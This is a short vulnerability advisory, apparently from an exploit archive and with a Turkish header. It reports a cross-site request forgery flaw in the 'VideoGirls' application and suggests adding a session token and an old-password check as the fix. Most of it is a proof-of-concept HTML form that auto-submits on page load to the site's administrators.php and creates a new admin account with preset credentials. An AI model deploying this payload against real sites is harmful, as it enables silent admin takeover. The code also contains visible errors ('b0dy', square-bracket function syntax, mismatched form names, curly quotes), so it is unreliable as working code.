< ------------------- header data start ------------------- >

#############################################################

# Application Name : VideoGirls

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form name=’form1’ method=’post’ action=’http://www.site.com/webmaster/administrators.php’>

<input name=’username_new’ type=text value=’addadd’ size=16 maxlength=32>
<input name=’password_new’ type=text value=’addadd’ size=16 maxlength=32>
<input name=’email_new’ type=text value=’[email protected]’ size=32 maxlength=64>
<input name=’name_new’ type=text value=’add’ size=32 maxlength=64>


<input type=’submit’ name=’Submit’ value=’Save’ />

< -- bug code end of -- >